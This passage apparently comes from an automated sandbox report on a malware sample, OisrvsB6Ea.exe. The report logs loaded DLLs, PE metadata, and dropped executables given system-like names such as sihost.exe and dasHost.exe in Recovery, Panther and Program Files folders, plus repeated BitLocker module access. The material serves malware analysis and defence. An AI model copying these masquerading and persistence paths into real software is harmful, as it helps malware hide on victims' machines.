                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDirectory created: C:\Program Files\WindowsPowerShell\Modules\sihost.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDirectory created: C:\Program Files\WindowsPowerShell\Modules\66fc9ff0ee96c2Jump to behavior
                        Source: OisrvsB6Ea.exeStatic file information: File size 1899080 > 1048576
                        Source: OisrvsB6Ea.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: OisrvsB6Ea.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: OisrvsB6Ea.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: OisrvsB6Ea.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: OisrvsB6Ea.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: OisrvsB6Ea.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: OisrvsB6Ea.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: OisrvsB6Ea.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: OisrvsB6Ea.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: OisrvsB6Ea.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: OisrvsB6Ea.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: OisrvsB6Ea.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\__tmp_rar_sfx_access_check_7029109Jump to behavior
                        Source: OisrvsB6Ea.exeStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028F640 push ecx; ret 0_2_0028F653
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028EB78 push eax; ret 0_2_0028EB96
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BAA538F push ecx; ret 8_2_00007FFD9BAA5392
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BAA4B80 pushad ; retf 8_2_00007FFD9BAA4B83
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BAA4784 push ebx; iretd 8_2_00007FFD9BAA4790
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BAA3629 push E8FFFFFDh; iretd 8_2_00007FFD9BAA362E
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BE854D6 push ebx; iretd 8_2_00007FFD9BE855DA
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BE88F5A push eax; retf 8_2_00007FFD9BE88F59
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BE88EF2 push eax; retf 8_2_00007FFD9BE88F59
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BE85574 push ebx; iretd 8_2_00007FFD9BE855DA
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\ZDjBezmV.logJump to dropped file
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\DBQFDgRN.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\xIogbBMY.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\DjKnpLXK.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\FpiFczmJ.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\vBEPsorb.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\BkJolhdT.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\mUJprpRq.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\YBKLwVHY.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Program Files\WindowsPowerShell\Modules\sihost.exeJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\amqbDjSR.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\tSxpUEMf.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\pIbqPImn.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\REWLTGNk.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\PVPluWhn.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\DjKnpLXK.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\ZDjBezmV.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\PVPluWhn.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\xIogbBMY.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\mUJprpRq.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\DBQFDgRN.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\tSxpUEMf.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\BkJolhdT.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\amqbDjSR.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\REWLTGNk.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\pIbqPImn.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\YBKLwVHY.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\FpiFczmJ.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\vBEPsorb.logJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
